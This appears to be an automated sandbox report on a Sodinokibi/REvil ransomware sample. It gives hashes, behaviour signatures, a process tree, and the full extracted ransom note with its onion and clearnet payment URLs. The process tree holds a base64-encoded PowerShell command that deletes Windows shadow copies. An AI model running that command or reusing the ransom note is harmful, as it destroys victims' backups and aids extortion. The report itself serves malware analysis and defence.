Analysis

  • max time kernel
    145s
  • max time network
    159s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    30-01-2022 08:02

General

  • Target

    133bf8be0cf7003b83b03579970997d408a930e58ec2726715140520900c06de.exe

  • Size

    114KB

  • MD5

    77be32b91561d1ac5e36464766b7b0a7

  • SHA1

    9c72fe9c8e24b5c0bde50c71d74fb2586c4201ce

  • SHA256

    133bf8be0cf7003b83b03579970997d408a930e58ec2726715140520900c06de

  • SHA512

    c8d0d6d15322172631b184acf5df86851dff7d8f15fde9cee7d0b7e4919433ec5b096f4079b5acba78d27dcfc42bfc2bcd3f184cb0a54c13b71aeb40f8ea4152

Malware Config

Extracted

Path

C:\r5162-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension r5162. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EE47027523359370 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/EE47027523359370 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: KKh7mEvhdHV8juExmq7KlGlfIbFc/ZOFJ98gVcns5zgIKm5rLCUQefpkepdC4fG9 R5GtlAMVW8LrtTG5BX2Pw3eUTw+SYq4Q0SC1y3jINSL6Td0TDH0K+Ul05CVcwdyN Pyv/Wnkd/2FWLXszwrNKVw6F1OgAYQG2Pk1TB2DaIjtfHksT/U3d3GXmrCS45pg1 x5xsWJgPRDp7p5csigItwOTCKgj59FtpWn9St6RhrHGyubXqid4G4Zjb0psyh4Kq grvf54mfwSHjQIoLWfJnAWb6D+x9+rWmEhi6Y7h8QjfZfAt9bbRjt4srVT5f9+ZY 9JWS0tJH5msDEVhHp7sWc7aNKP3NmG89ZqBqJQCbq50iVqptgpgnUza8/Vhcra5q NRryIrkM45YE0LYgzfyrfuqhxQSH106WPy9gPRsovEGTZ5IODh3+4EvxEAxkBpsu IpnLnHIJiK+bLFyNg/AQs0MhUeJJHJ2vu19vE1/oI9ew+sw8o/z8GVj8XaS5wDNT zthjCkEvs93WVPkIVIoX0Rc+VoaK+3G452wtfukGP3QeJ8HpZtFcHUceEuxS+YQ5 ZMSSiChUIqjhHtl9quiqNM1ET6hi9BTlwzDeueFB11gDA4w6DiCnHy3EX5kBmCc2 9ZwECiA+mV5hsyxIS9ukHI5KX1T3Hi5pcLhx88t6gWiOFqHFaH5yx4ChSjKVzOD5 30NcxtdgkgCoNXBfd99cOJlCsyFbILe7Jo3/C3lMRoTSoqiltgRws1T7r/gFFjEJ WI++Zwui/UesrdFZUtfSmWpTBsl3rHfZR4XT7JpTSC1LGyVbiQtH6ePMh5XhwIlU EbVmXond9eN/5UatdKUgTl6azMrEil+h4GopTFo6S76w4I3XWhR2EB1zgBNPM6UC n6nYPs91m7rKU6SRZzkrkZ59e+l/lq/2pnjAI+XiW4T2j9Fko1JlslV3Di6ULzVY sADlfgNbAo0s+14g3XiHdRpTyVgl9mmaTU56wJndXHeZ6Ag4ep25Tr2YO7elWJ9c tkWdHX2sW97cjB1Z+/1ed3vWCk2BVsXZUw3FRW+GbMfC9Nuag6uAQRVeyvtYOCEo A+oRrGSizCQJ7Wp6sdjmPzmBIBFgwj/JFLuaheHMEzBuLKQDR/eq4f6MsqAhnGYh eekSseO6nskfLa8/C+3gSvY27cilvEDJzq7lAMhGnWoAXkBxhxASJ3XmLYXK1ICX hYMjey4P3cHtmxxFO4KeMBikJPEZ2iSSC705nOQ6rLkIZcxZK90l3SEVpnydJHIf c2THL7jEQMff0PlphXFdD2MQoG1YXw== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EE47027523359370

http://decryptor.cc/EE47027523359370

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 12 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 36 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\133bf8be0cf7003b83b03579970997d408a930e58ec2726715140520900c06de.exe
    "C:\Users\Admin\AppData\Local\Temp\133bf8be0cf7003b83b03579970997d408a930e58ec2726715140520900c06de.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:592
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:332
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:692
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:676

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/332-55-0x000007FEFB591000-0x000007FEFB593000-memory.dmp
      Filesize

      8KB

    • memory/332-57-0x00000000029B0000-0x00000000029B2000-memory.dmp
      Filesize

      8KB

    • memory/332-58-0x00000000029B2000-0x00000000029B4000-memory.dmp
      Filesize

      8KB

    • memory/332-59-0x00000000029B4000-0x00000000029B7000-memory.dmp
      Filesize

      12KB

    • memory/332-56-0x000007FEF2660000-0x000007FEF31BD000-memory.dmp
      Filesize

      11.4MB

    • memory/332-60-0x00000000029BB000-0x00000000029DA000-memory.dmp
      Filesize

      124KB

    • memory/592-54-0x00000000751B1000-0x00000000751B3000-memory.dmp
      Filesize

      8KB